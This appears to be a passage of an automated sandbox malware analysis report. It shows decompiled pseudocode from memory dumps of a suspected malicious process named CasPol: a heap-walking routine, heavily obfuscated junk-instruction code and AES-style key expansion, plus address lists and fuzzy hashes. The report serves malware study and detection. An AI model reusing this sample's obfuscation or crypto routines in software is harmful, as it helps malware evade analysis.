						_t102 = 0;
						_v20 = 0;
						__eflags = _t109;
						if(_t109 == 0) {
							_t109 = _t126;
						}
						_t128 = 0;
						__eflags = _t109 - _t121;
						if(_t109 >= _t121) {
							L29:
							_t111 = _v8 + 0xfffffff8;
							__eflags = _t111 - _t121;
							if(_t111 <= _t121) {
								L33:
								 *0x17158b0 = _t128;
								 *0x17158b4 = _t102;
								__eflags = _t128;
								if(_t128 == 0) {
									L42:
									__eflags =  *(_t130 + 0x4c);
									if( *(_t130 + 0x4c) == 0) {
										_t77 =  *_t128 & 0x0000ffff;
										_t112 = 0;
										__eflags = 0;
									} else {
										_t85 =  *_t128;
										_t112 =  *(_t130 + 0x4c);
										__eflags = _t85 & _t112;
										if((_t85 & _t112) != 0) {
											_t85 = _t85 ^  *(_t130 + 0x50);
											__eflags = _t85;
										}
										_t77 = _t85 & 0x0000ffff;
									}
									_v8 = _t77;
									__eflags = _t102;
									if(_t102 != 0) {
										_t117 =  *(_t102 + 4) & 0x0000ffff ^  *(_t130 + 0x54) & 0x0000ffff;
										__eflags = _t117;
										 *0x17158b8 = _t117;
										_t112 =  *(_t130 + 0x4c);
									}
									__eflags = _t112;
									if(_t112 == 0) {
										_t78 =  *_t128 & 0x0000ffff;
									} else {
										_t83 =  *_t128;
										__eflags =  *(_t130 + 0x4c) & _t83;
										if(( *(_t130 + 0x4c) & _t83) != 0) {
											_t83 = _t83 ^  *(_t130 + 0x50);
											__eflags = _t83;
										}
										_t78 = _t83 & 0x0000ffff;
									}
									_t122 = _t78 & 0x0000ffff;
									 *0x17158bc = _t122;
									__eflags =  *(_t130 + 0x4c);
									_t113 = _v8 & 0x0000ffff;
									if( *(_t130 + 0x4c) == 0) {
										_t80 =  *(_t128 + _t113 * 8) & 0x0000ffff;
									} else {
										_t82 =  *(_t128 + _t113 * 8);
										__eflags =  *(_t130 + 0x4c) & _t82;
										if(( *(_t130 + 0x4c) & _t82) != 0) {
											_t82 = _t82 ^  *(_t130 + 0x50);
											__eflags = _t82;
										}
										_t122 =  *0x17158bc; // 0x0
										_t80 = _t82 & 0x0000ffff;
									}
									_t81 = _t80 & 0x0000ffff;
									__eflags =  *0x17158b8 - _t81; // 0x0
									if(__eflags == 0) {
										_t75 =  *(_t130 + 0x54) & 0x0000ffff;
										__eflags = _t122 - ( *(_t128 + 4 + _t113 * 8) & 0x0000ffff ^ _t75);
										if(_t122 == ( *(_t128 + 4 + _t113 * 8) & 0x0000ffff ^ _t75)) {
											goto L68;
										}
										 *0x1715898 = 7;
										return _t75;
									} else {
										 *0x1715898 = 6;
										return _t81;
									}
								}
								__eflags = _t102;
								if(_t102 == 0) {
									goto L42;
								}
								__eflags =  *(_t130 + 0x4c);
								if( *(_t130 + 0x4c) == 0) {
									_t86 =  *_t128 & 0x0000ffff;
								} else {
									_t91 =  *_t128;
									__eflags =  *(_t130 + 0x4c) & _t91;
									if(( *(_t130 + 0x4c) & _t91) != 0) {
										_t91 = _t91 ^  *(_t130 + 0x50);
										__eflags = _t91;
									}
									_t86 = _t91 & 0x0000ffff;
								}
								_v8 = _t86;
								_t90 = _t128 + (_v8 & 0x0000ffff) * 8;
								__eflags = _t90 - _t102 - (( *(_t102 + 4) & 0x0000ffff ^  *(_t130 + 0x54) & 0x0000ffff) << 3);
								if(_t90 == _t102 - (( *(_t102 + 4) & 0x0000ffff ^  *(_t130 + 0x54) & 0x0000ffff) << 3)) {
									goto L42;
								} else {
									 *0x1715898 = 4;
									return _t90;
								}
							}
							_v20 =  *(_t130 + 0x54) & 0x0000ffff;
							while(1) {
								_t102 = _t111;
								_t95 = ( *(_t111 + 4) ^ _v20) & 0x0000ffff;
								__eflags = _t95;
								if(_t95 == 0) {
									goto L33;
								}
								_t111 = _t111 + _t95 * 0xfffffff8;
								__eflags = _t111 - _t121;
								if(_t111 > _t121) {
									continue;
								}
								goto L33;
							}
							goto L33;
						} else {
							_t103 =  *(_t130 + 0x4c);
							while(1) {
								_t128 = _t109;
								__eflags = _t103;
								if(_t103 == 0) {
									_t97 =  *_t109 & 0x0000ffff;
								} else {
									_t99 =  *_t109;
									_t103 =  *(_t130 + 0x4c);
									__eflags = _t99 & _t103;
									if((_t99 & _t103) != 0) {
										_t99 = _t99 ^  *(_t130 + 0x50);
										__eflags = _t99;
									}
									_t97 = _t99 & 0x0000ffff;
								}
								__eflags = _t97;
								if(_t97 == 0) {
									break;
								}
								_t109 = _t109 + (_t97 & 0x0000ffff) * 8;
								__eflags = _t109 - _t121;
								if(_t109 < _t121) {
									continue;
								}
								break;
							}
							_t102 = _v20;
							goto L29;
						}
					}
					_t133 = _v8;
					do {
						_t105 =  *((intOrPtr*)(_t76 + 0xc)) +  *((intOrPtr*)(_t76 + 8));
						_t129 = _v12;
						__eflags = _t105 - _t121;
						if(_t105 < _t121) {
							__eflags = _t105 - _t109;
							if(_t105 > _t109) {
								_t109 = _t105;
							}
						}
						_t106 =  *((intOrPtr*)(_t76 + 8));
						__eflags = _t106 - _t121;
						if(_t106 > _t121) {
							__eflags = _t133;
							if(_t133 == 0) {
								L14:
								_t18 = _t76 - 8; // -8
								_t133 = _t18;
								goto L15;
							}
							__eflags = _t106 -  *((intOrPtr*)(_t133 + 0x10));
							if(_t106 >=  *((intOrPtr*)(_t133 + 0x10))) {
								goto L15;
							}
							goto L14;
						}
						L15:
						_t76 =  *_t76;
						__eflags = _t76 - _t129;
					} while (_t76 != _t129);
					_t126 = _v20;
					_v8 = _t133;
					_t130 = _v16;
					goto L17;
				}
				goto L3;
			}











































                                                                0x016e1002
                                                                0x016e100c
                                                                0x016e100f
                                                                0x016e1012
                                                                0x016e1018
                                                                0x00000000
                                                                0x016e102e
                                                                0x016e1030
                                                                0x00000000
                                                                0x016e1032
                                                                0x016e1032
                                                                0x016e1038
                                                                0x016e1038
                                                                0x016e121e
                                                                0x016e11ff
                                                                0x016e1205
                                                                0x016e1207
                                                                0x016e120c
                                                                0x016e120e
                                                                0x016e1210
                                                                0x016e1212
                                                                0x016e1212
                                                                0x016e1210
                                                                0x016e121c
                                                                0x016e121c
                                                                0x016e1228
                                                                0x016e1228
                                                                0x016e101c
                                                                0x016e101c
                                                                0x016e101c
                                                                0x016e101f
                                                                0x016e1022
                                                                0x016e1025
                                                                0x016e102c
                                                                0x016e102c
                                                                0x00000000
                                                                0x016e102c
                                                                0x016e1027
                                                                0x016e102a
                                                                0x016e103f
                                                                0x016e103f
                                                                0x016e1042
                                                                0x016e1044
                                                                0x016e1047
                                                                0x016e1049
                                                                0x016e104c
                                                                0x016e104e
                                                                0x016e1088
                                                                0x016e1088
                                                                0x016e108a
                                                                0x016e108d
                                                                0x016e108f
                                                                0x016e1091
                                                                0x016e1091
                                                                0x016e1093
                                                                0x016e1095
                                                                0x016e1097
                                                                0x016e10c8
                                                                0x016e10cb
                                                                0x016e10ce
                                                                0x016e10d0
                                                                0x016e10f4
                                                                0x016e10f4
                                                                0x016e10fa
                                                                0x016e1100
                                                                0x016e1102
                                                                0x016e1150
                                                                0x016e1150
                                                                0x016e1154
                                                                0x016e1167
                                                                0x016e116a
                                                                0x016e116a
                                                                0x016e1156
                                                                0x016e1156
                                                                0x016e1158
                                                                0x016e115b
                                                                0x016e115d
                                                                0x016e115f
                                                                0x016e115f
                                                                0x016e115f
                                                                0x016e1162
                                                                0x016e1162
                                                                0x016e116c
                                                                0x016e116f
                                                                0x016e1171
                                                                0x016e117b
                                                                0x016e117b
                                                                0x016e117d
                                                                0x016e1183
                                                                0x016e1183
                                                                0x016e1186
                                                                0x016e1188
                                                                0x016e1199
                                                                0x016e118a
                                                                0x016e118a
                                                                0x016e118c
                                                                0x016e118f
                                                                0x016e1191
                                                                0x016e1191
                                                                0x016e1191
                                                                0x016e1194
                                                                0x016e1194
                                                                0x016e119c
                                                                0x016e11a2
                                                                0x016e11a8
                                                                0x016e11ac
                                                                0x016e11af
                                                                0x016e11c7
                                                                0x016e11b1
                                                                0x016e11b1
                                                                0x016e11b4
                                                                0x016e11b7
                                                                0x016e11b9
                                                                0x016e11b9
                                                                0x016e11b9
                                                                0x016e11bc
                                                                0x016e11c2
                                                                0x016e11c2
                                                                0x016e11cb
                                                                0x016e11ce
                                                                0x016e11d4
                                                                0x016e11e7
                                                                0x016e11ed
                                                                0x016e11ef
                                                                0x00000000
                                                                0x00000000
                                                                0x016e11f1
                                                                0x00000000
                                                                0x016e11d6
                                                                0x016e11d6
                                                                0x00000000
                                                                0x016e11d6
                                                                0x016e11d4
                                                                0x016e1104
                                                                0x016e1106
                                                                0x00000000
                                                                0x00000000
                                                                0x016e1108
                                                                0x016e110c
                                                                0x016e111d
                                                                0x016e110e
                                                                0x016e110e
                                                                0x016e1110
                                                                0x016e1113
                                                                0x016e1115
                                                                0x016e1115
                                                                0x016e1115
                                                                0x016e1118
                                                                0x016e1118
                                                                0x016e1126
                                                                0x016e113a
                                                                0x016e113d
                                                                0x016e113f
                                                                0x00000000
                                                                0x016e1141
                                                                0x016e1141
                                                                0x00000000
                                                                0x016e1141
                                                                0x016e113f
                                                                0x016e10d6
                                                                0x016e10d9
                                                                0x016e10dd
                                                                0x016e10e3
                                                                0x016e10e6
                                                                0x016e10e9
                                                                0x00000000
                                                                0x00000000
                                                                0x016e10ee
                                                                0x016e10f0
                                                                0x016e10f2
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x016e10f2
                                                                0x00000000
                                                                0x016e1099
                                                                0x016e1099
                                                                0x016e109c
                                                                0x016e109c
                                                                0x016e109e
                                                                0x016e10a0
                                                                0x016e10b3
                                                                0x016e10a2
                                                                0x016e10a2
                                                                0x016e10a4
                                                                0x016e10a7
                                                                0x016e10a9
                                                                0x016e10ab
                                                                0x016e10ab
                                                                0x016e10ab
                                                                0x016e10ae
                                                                0x016e10ae
                                                                0x016e10b6
                                                                0x016e10b9
                                                                0x00000000
                                                                0x00000000
                                                                0x016e10be
                                                                0x016e10c1
                                                                0x016e10c3
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x016e10c3
                                                                0x016e10c5
                                                                0x00000000
                                                                0x016e10c5
                                                                0x016e1097
                                                                0x016e1050
                                                                0x016e1053
                                                                0x016e1056
                                                                0x016e1059
                                                                0x016e105c
                                                                0x016e105e
                                                                0x016e1060
                                                                0x016e1062
                                                                0x016e1064
                                                                0x016e1064
                                                                0x016e1062
                                                                0x016e1066
                                                                0x016e1069
                                                                0x016e106b
                                                                0x016e106d
                                                                0x016e106f
                                                                0x016e1076
                                                                0x016e1076
                                                                0x016e1076
                                                                0x00000000
                                                                0x016e1076
                                                                0x016e1071
                                                                0x016e1074
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x016e1074
                                                                0x016e1079
                                                                0x016e1079
                                                                0x016e107b
                                                                0x016e107b
                                                                0x016e107f
                                                                0x016e1082
                                                                0x016e1085
                                                                0x00000000
                                                                0x016e1085
                                                                0x00000000

                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 817e45e0a425051a8f02aece8244c4f29bf633ba85861e3499bd212191efeeec
                                                                • Instruction ID: cc868772d2b013cb375a421df5a6b71cf7efbbf6bc0db0fdff9736baab07ea25
                                                                • Opcode Fuzzy Hash: 817e45e0a425051a8f02aece8244c4f29bf633ba85861e3499bd212191efeeec
                                                                • Instruction Fuzzy Hash: 6971B034602761CFDB28CF59C88467ABBF1FF46301B64866ED9928B740DB71E990EB50
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00422BF8 Relevance: .2, Instructions: 171COMMONCrypto
                                                                Download Yara Rule
                                                                C-Code - Quality: 48%
                                                                			E00422BF8(signed char __eax, void* __ebx, signed int __edx, signed int __esi) {
				signed char _t13;
				void* _t14;
				signed int _t15;
				signed int _t22;
				signed int _t24;
				signed char _t30;
				signed char _t33;
				void* _t37;
				intOrPtr _t38;
				signed int _t41;
				signed int _t45;
				intOrPtr _t46;
				signed int _t47;
				void* _t51;
				void* _t56;

				_t13 = __eax;
				 *0xab9c4208 =  *0xab9c4208 ^ __edx;
				asm("adc esi, 0x32baf2c1");
				_push( *0xefa8e0cc);
				asm("cmpsw");
				_t41 = (__esi ^  *0x983e0416) -  *0xbed3f5bd;
				_pop(_t37);
				asm("adc [0xa4071c62], edi");
				 *0xcc32c1db =  *0xcc32c1db ^ _t45;
				 *0x16efa8e0 =  *0x16efa8e0 << 0x19;
				asm("ror dword [0x7c73a2fe], 0x77");
				 *0xef45d8a8 =  *0xef45d8a8 << 0x22;
				 *0xa0f4be16 =  *0xa0f4be16 >> 0xf6;
				asm("adc esi, [0x99d1b49b]");
				asm("adc [0x49395fa8], ah");
				asm("ror byte [0x947a16d2], 0x3d");
				 *0xdec32e33 =  *0xdec32e33 - _t37;
				 *0xe0cc32c1 = _t45;
				 *0xc16efa8 =  *0xc16efa8 >> 0xda;
				_t38 = _t37 + 1;
				asm("rol byte [0xccecc9b4], 0x58");
				 *0xcdc48616 =  *0x16d24939 - 0x0000001c | 0xf2;
				_t33 = 0x3c;
				asm("sbb esi, 0x32c1ddbd");
				_t30 =  *0xcdc48616 |  *0xefa8e0cc;
				_t56 = (__ebx +  *0xc4a8009a ^  *0x93b70016) - 1;
				if(_t56 < 0) {
					L1:
					asm("sbb [0x939ff7b7], ch");
					asm("sbb cl, [0x8f83e7b0]");
				} else {
					__ebp = __ebp & 0xaf88ac70;
					_pop(__edi);
					 *0x54942410 =  *0x54942410 >> 0x7b;
					 *0xaddd0fb4 =  *0xaddd0fb4 & __ch;
					asm("adc [0xef45d88d], esp");
					 *0x90e04c16 =  *0x90e04c16 ^ __edx;
					if( *0x90e04c16 > 0) {
						goto L1;
						do {
							do {
								do {
									do {
										do {
											do {
												goto L1;
											} while (_t56 == 0);
											_t22 =  *0xdc624d74;
											_t46 =  *0xc419e217;
											_t13 = _t13 + 0x84e5c4bb;
										} while (_t13 != 0);
										asm("adc [0xdd634e75], ebp");
										 *0xaeb00218 =  *0xaeb00218 - _t13;
									} while ( *0xaeb00218 >= 0);
									 *0xe77cd173 =  *0xe77cd173 >> 0x49;
									asm("lodsb");
									asm("sbb ecx, 0xef4544a1");
									asm("adc edx, [0x2f9d1616]");
									_t33 = _t33 ^ 0x0000001c;
									asm("adc [0x32c1ddbd], edx");
									 *0xefa8e0cc =  *0xefa8e0cc + _t13;
									asm("adc ecx, [0x85c02c16]");
									asm("adc eax, 0xb2efca25");
									asm("adc al, [0xa8e0cc32]");
									asm("adc [0xc6a616ef], eax");
									_t47 = _t46 + 1;
									 *0xa8e0cc32 =  *0xa8e0cc32 << 0xe9;
									 *0xc83916ef = _t22;
								} while ( *0xa8e0cc32 != 0);
								asm("ror dword [0x997775], 0x29");
								asm("rcl dword [0x45d8a8c4], 0xd9");
								asm("rol dword [0xe0cc32c1], 0xb2");
								asm("sbb al, 0xa8");
								_t38 = _t38 -  *0xc83816ef;
							} while (_t38 != 0);
							_t14 = _t13 + 1;
							_push(_t14);
							 *0xef45d88d = _t47;
							asm("rcl byte [0x4052173a], 0xd3");
							_push(_t14);
							asm("rol dword [0x81c42916], 0x83");
							asm("ror byte [0x4052173a], 0x66");
							 *0x9cba1d16 = _t41 & 0x81d04116 &  *0xef45d88d;
							_t15 = _t14;
							 *0xaddd0fb4 =  *0xaddd0fb4 << 0x90;
							asm("rol dword [0x87dbae16], 0x64");
							 *0xe7553110 =  *0xe7553110 >> 0x65;
							_t38 =  *0x453d99a1;
							asm("sbb edx, [0x32ee16ef]");
							asm("rcr dword [0xe0cc3283], 0x9b");
							_t24 = (_t22 |  *0xef45d88d) ^ 0x000000a8;
							 *0x6d2b16ef =  *0x6d2b16ef & _t15;
							asm("adc ah, [0xefbe0b1c]");
							 *0x8a16efa8 =  *0x8a16efa8 & _t15;
							_t41 =  *0xcc32bfdd;
							asm("adc esp, 0x2b7093ff");
							 *0xcc32c5f7 =  *0xcc32c5f7 ^ _t24;
							_t13 = _t15 &  *0xbe17ff2f | 0xe6;
							asm("rol byte [0xf216efa8], 0x92");
							asm("adc ch, 0x34");
							_t51 = _t51 -  *0xef45d88d -  *0xd9b004fa;
							 *0xe0cc32b9 =  *0xe0cc32b9 + _t30;
							_t33 = (_t33 +  *0x52173a7b |  *0x16efa8e0) & 0x000000a8;
							 *0xc62116ef =  *0xc62116ef >> 0xd8;
							asm("adc [0x1ee67b3], bl");
							asm("ror dword [0x395fc0d6], 0xaa");
							_t30 = _t30 - 1;
						} while (( *0xa2f716d2 & _t30) <= 0);
						asm("sbb [0xe2aa9076], esp");
						asm("adc edx, [0x395f828e]");
						 *0x36b616d2 =  *0x36b616d2 + _t24;
						asm("rcr dword [0xebb8140b], 0x4");
						 *0xa816efa8 =  *0xa816efa8 - _t13;
						 *0x9d8d8ce2 =  *0x9d8d8ce2 & _t33;
						asm("sbb [0x16efa8e0], cl");
						asm("sbb ecx, [0x1269e8e]");
						 *0x32c1d79c = 0xcc32aece;
						asm("rol dword [0x9af2ba16], 0x4a");
						 *0xccf9af86 =  *0xccf9af86 << 0x98;
						return _t13;
					} else {
						asm("rcl dword [0xa8008977], 0xc1");
						asm("adc ebx, 0x45d8a8c4");
						 *0x40ecb2a1 =  *0x40ecb2a1 << 0xe;
						asm("ror byte [0x8f16ef88], 0xfb");
						__edx = __edx |  *0x826380d6;
						 *0xd8a8c4a8 =  *0xd8a8c4a8 & __ch;
						__ebp = __ebp + 1;
						__edi = __edi |  *0x121f16ef;
						_push( *0xf9e2bbc);
						asm("adc ch, 0x88");
						__ebx =  *0x395fc2cc;
						 *0x941616d2 =  *0x941616d2 + __bh;
						 *0xdec32e33 = 0xe24b16ef;
						_push( *0xe0cc32c1);
						_t12 = __dl;
						__dl =  *0x6216efa8;
						 *0x6216efa8 = _t12;
						 *0x9a8081e2 =  *0x9a8081e2 & __bl;
						asm("rol dword [0x16ef45d8], 0xe2");
						asm("sbb [0x3a78d6b6], dh");
						__al = __al | 0x00000016;
						return __eax;
					}
				}
			}


















                                                                0x00422bf8
                                                                0x00422bff
                                                                0x00422c05
                                                                0x00422c0b
                                                                0x00422c17
                                                                0x00422c19
                                                                0x00422c1f
                                                                0x00422c29
                                                                0x00422c2f
                                                                0x00422c35
                                                                0x00422c3c
                                                                0x00422c49
                                                                0x00422c50
                                                                0x00422c57
                                                                0x00422c5d
                                                                0x00422c63
                                                                0x00422c6a
                                                                0x00422c70
                                                                0x00422c76
                                                                0x00422c7d
                                                                0x00422c81
                                                                0x00422c91
                                                                0x00422c97
                                                                0x00422c99
                                                                0x00422c9f
                                                                0x00422cab
                                                                0x00422cac
                                                                0x00422a03
                                                                0x00422a03
                                                                0x00422a09
                                                                0x00422cb2
                                                                0x00422cb2
                                                                0x00422cb8
                                                                0x00422cbe
                                                                0x00422cc5
                                                                0x00422ccb
                                                                0x00422cd1
                                                                0x00422cd7
                                                                0x00000000
                                                                0x00422a03
                                                                0x00422a03
                                                                0x00422a03
                                                                0x00422a03
                                                                0x00422a03
                                                                0x00422a03
                                                                0x00000000
                                                                0x00000000
                                                                0x00422a11
                                                                0x00422a17
                                                                0x00422a1d
                                                                0x00422a1d
                                                                0x00422a25
                                                                0x00422a2b
                                                                0x00422a2b
                                                                0x00422a33
                                                                0x00422a3a
                                                                0x00422a3b
                                                                0x00422a41
                                                                0x00422a47
                                                                0x00422a4a
                                                                0x00422a50
                                                                0x00422a56
                                                                0x00422a5c
                                                                0x00422a61
                                                                0x00422a67
                                                                0x00422a6d
                                                                0x00422a74
                                                                0x00422a7b
                                                                0x00422a7b
                                                                0x00422a83
                                                                0x00422a8d
                                                                0x00422aa0
                                                                0x00422aa7
                                                                0x00422aa9
                                                                0x00422aa9
                                                                0x00422abb
                                                                0x00422abc
                                                                0x00422abd
                                                                0x00422ac9
                                                                0x00422ad0
                                                                0x00422ad7
                                                                0x00422ade
                                                                0x00422aec
                                                                0x00422af2
                                                                0x00422af3
                                                                0x00422b00
                                                                0x00422b07
                                                                0x00422b0e
                                                                0x00422b14
                                                                0x00422b20
                                                                0x00422b27
                                                                0x00422b2a
                                                                0x00422b30
                                                                0x00422b3c
                                                                0x00422b48
                                                                0x00422b54
                                                                0x00422b5d
                                                                0x00422b63
                                                                0x00422b66
                                                                0x00422b6d
                                                                0x00422b70
                                                                0x00422b76
                                                                0x00422b7c
                                                                0x00422b7f
                                                                0x00422b86
                                                                0x00422b8c
                                                                0x00422b93
                                                                0x00422b94
                                                                0x00422ba0
                                                                0x00422ba6
                                                                0x00422bad
                                                                0x00422bb3
                                                                0x00422bc0
                                                                0x00422bc6
                                                                0x00422bd1
                                                                0x00422bd7
                                                                0x00422bdd
                                                                0x00422be9
                                                                0x00422bf0
                                                                0x00422bf7
                                                                0x00422cdd
                                                                0x00422cdd
                                                                0x00422ce4
                                                                0x00422cf6
                                                                0x00422cfd
                                                                0x00422d04
                                                                0x00422d0d
                                                                0x00422d13
                                                                0x00422d14
                                                                0x00422d1a
                                                                0x00422d26
                                                                0x00422d35
                                                                0x00422d3c
                                                                0x00422d42
                                                                0x00422d48
                                                                0x00422d4e
                                                                0x00422d4e
                                                                0x00422d4e
                                                                0x00422d54
                                                                0x00422d60
                                                                0x00422d67
                                                                0x00422d79
                                                                0x00422d7b
                                                                0x00422d7b
                                                                0x00422cd7

                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312223010.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_400000_CasPol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 1255c3b567cb2f402ac3d907e62502bd845f7c6f8968ebe21c9db83a3cc6eed2
                                                                • Instruction ID: a4e25e313fca7d11b0d8e206a134e9c9b3fc2bd5a26cd2836586e68674f23310
                                                                • Opcode Fuzzy Hash: 1255c3b567cb2f402ac3d907e62502bd845f7c6f8968ebe21c9db83a3cc6eed2
                                                                • Instruction Fuzzy Hash: 4181013284C7D1DFEB11DF78E89A6453F71F746320B48038EC9A15B6E2D3A4256ACB85
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 004055AA Relevance: .2, Instructions: 166COMMONCrypto
                                                                Download Yara Rule
                                                                C-Code - Quality: 62%
                                                                			E004055AA(void* __ecx, void* __edx, void* __fp0, signed int* _a4, signed int* _a8, intOrPtr _a12) {
				void* _v117;
				signed int _t67;
				intOrPtr _t72;
				signed int* _t87;
				signed int _t100;
				signed int _t102;
				signed int _t112;
				signed int _t114;
				signed int* _t118;
				signed int _t135;
				signed int _t137;
				signed int _t141;
				void* _t142;
				signed int _t162;
				signed int* _t184;

				asm("aaa");
				ds = _t142;
				asm("sti");
				_push(_t142);
				_t87 = _a8;
				_t118 = _a4;
				_push(_t142);
				asm("ror esi, 0x8");
				asm("rol eax, 0x8");
				 *_t118 =  *_t87 & 0xff00ff00 |  *_t87 & 0x00ff00ff;
				asm("ror edi, 0x8");
				asm("rol esi, 0x8");
				_t118[1] = _t87[1] & 0xff00ff00 | _t87[1] & 0x00ff00ff;
				asm("ror edi, 0x8");
				asm("rol esi, 0x8");
				_t118[2] = _t87[2] & 0xff00ff00 | _t87[2] & 0x00ff00ff;
				_t67 =  &(_t118[1]);
				asm("ror edi, 0x8");
				asm("rol esi, 0x8");
				_t118[3] = _t87[3] & 0xff00ff00 | _t87[3] & 0x00ff00ff;
				asm("ror edi, 0x8");
				asm("rol esi, 0x8");
				_t118[4] = _t87[4] & 0xff00ff00 | _t87[4] & 0x00ff00ff;
				asm("ror edi, 0x8");
				asm("rol esi, 0x8");
				_t118[5] = _t87[5] & 0xff00ff00 | _t87[5] & 0x00ff00ff;
				asm("ror edi, 0x8");
				asm("rol esi, 0x8");
				_t118[6] = _t87[6] & 0xff00ff00 | _t87[6] & 0x00ff00ff;
				asm("ror esi, 0x8");
				asm("rol ecx, 0x8");
				_t118[7] = _t87[7] & 0xff00ff00 | _t87[7] & 0x00ff00ff;
				if(_a12 != 0x100) {
					L5:
					return _t67 | 0xffffffff;
				} else {
					_t184 = _a4;
					_t72 = 0;
					_a12 = 0;
					while(1) {
						_t162 =  *(_t67 + 0x18);
						_t100 = ( *(_t184 + 4 + (_t162 >> 0x00000010 & 0x000000ff) * 4) & 0xffff0000 ^ ( *(_t184 + _t72 + 0x904) & 0x000000ff) << 0x00000010) << 0x00000008 ^  *(_t184 + 4 + (_t162 >> 0x00000008 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t184 + 5 + (_t162 >> 0x00000018 & 0x000000ff) * 4) & 0x000000ff ^  *(_t184 + 4 + (_t162 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t67 - 4);
						_t135 =  *_t67 ^ _t100;
						 *(_t67 + 0x1c) = _t100;
						_t102 =  *(_t67 + 4) ^ _t135;
						 *(_t67 + 0x20) = _t135;
						_t137 =  *(_t67 + 8) ^ _t102;
						 *(_t67 + 0x24) = _t102;
						 *(_t67 + 0x28) = _t137;
						if(_t72 == 6) {
							break;
						}
						_t112 = ( *(_t184 + 4 + (_t137 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t184 + 4 + (_t137 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t184 + 4 + (_t137 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t184 + 5 + (_t137 & 0x000000ff) * 4) & 0x000000ff ^  *(_t67 + 0xc);
						_t141 =  *(_t67 + 0x10) ^ _t112;
						 *(_t67 + 0x2c) = _t112;
						_t114 =  *(_t67 + 0x14) ^ _t141;
						 *(_t67 + 0x34) = _t114;
						_t72 = _a12 + 1;
						 *(_t67 + 0x30) = _t141;
						 *(_t67 + 0x38) = _t114 ^ _t162;
						_t67 = _t67 + 0x20;
						_a12 = _t72;
						if(_t72 < 7) {
							continue;
						} else {
							goto L5;
						}
						goto L7;
					}
					return 0xe;
				}
				L7:
			}


















                                                                0x004055ab
                                                                0x004055ac
                                                                0x004055ae
                                                                0x004055af
                                                                0x004055b6
                                                                0x004055bb
                                                                0x004055c0
                                                                0x004055c3
                                                                0x004055cc
                                                                0x004055d6
                                                                0x004055dd
                                                                0x004055e6
                                                                0x004055f1
                                                                0x004055f9
                                                                0x00405602
                                                                0x0040560d
                                                                0x00405613
                                                                0x00405618
                                                                0x00405621
                                                                0x0040562c
                                                                0x00405634
                                                                0x0040563d
                                                                0x00405648
                                                                0x00405650
                                                                0x00405659
                                                                0x00405664
                                                                0x0040566c
                                                                0x00405675
                                                                0x00405680
                                                                0x00405688
                                                                0x00405691
                                                                0x004056a3
                                                                0x004056a6
                                                                0x004057c0
                                                                0x004057c7
                                                                0x004056ac
                                                                0x004056ac
                                                                0x004056af
                                                                0x004056b1
                                                                0x004056b4
                                                                0x004056b4
                                                                0x00405719
                                                                0x0040571e
                                                                0x00405720
                                                                0x00405726
                                                                0x00405728
                                                                0x0040572e
                                                                0x00405730
                                                                0x00405733
                                                                0x00405739
                                                                0x00000000
                                                                0x00000000
                                                                0x00405795
                                                                0x0040579b
                                                                0x0040579d
                                                                0x004057a3
                                                                0x004057a5
                                                                0x004057aa
                                                                0x004057ab
                                                                0x004057ae
                                                                0x004057b1
                                                                0x004057b4
                                                                0x004057ba
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x004057ba
                                                                0x004057d1
                                                                0x004057d1
                                                                0x00000000

                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312223010.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_400000_CasPol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 78470efef8b83ad90903656706623e77d4caeb47580477f083feeb57f9351569
                                                                • Instruction ID: d65976331063c118bc800cb770b3bfde48423cf13a1b4923c01ad9f9c739599f
                                                                • Opcode Fuzzy Hash: 78470efef8b83ad90903656706623e77d4caeb47580477f083feeb57f9351569
                                                                • Instruction Fuzzy Hash: 8951A2B3E14A214BD318CE09CC40672B792FFD8312B5B81BEDD199B357CA34A9529A90
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 004055B3 Relevance: .2, Instructions: 165COMMONCrypto
                                                                Download Yara Rule
                                                                C-Code - Quality: 67%
                                                                			E004055B3(intOrPtr _a4, signed int* _a8, signed int* _a12, intOrPtr _a16) {
				signed int _t66;
				signed int* _t69;
				signed int* _t81;
				signed int _t94;
				signed int _t96;
				signed int _t106;
				signed int _t108;
				signed int* _t110;
				signed int _t127;
				signed int _t129;
				signed int _t133;
				signed int _t152;
				intOrPtr _t171;

				_t81 = _a12;
				_t110 = _a8;
				asm("ror esi, 0x8");
				asm("rol eax, 0x8");
				 *_t110 =  *_t81 & 0xff00ff00 |  *_t81 & 0x00ff00ff;
				asm("ror edi, 0x8");
				asm("rol esi, 0x8");
				_t110[1] = _t81[1] & 0xff00ff00 | _t81[1] & 0x00ff00ff;
				asm("ror edi, 0x8");
				asm("rol esi, 0x8");
				_t110[2] = _t81[2] & 0xff00ff00 | _t81[2] & 0x00ff00ff;
				_t66 =  &(_t110[1]);
				asm("ror edi, 0x8");
				asm("rol esi, 0x8");
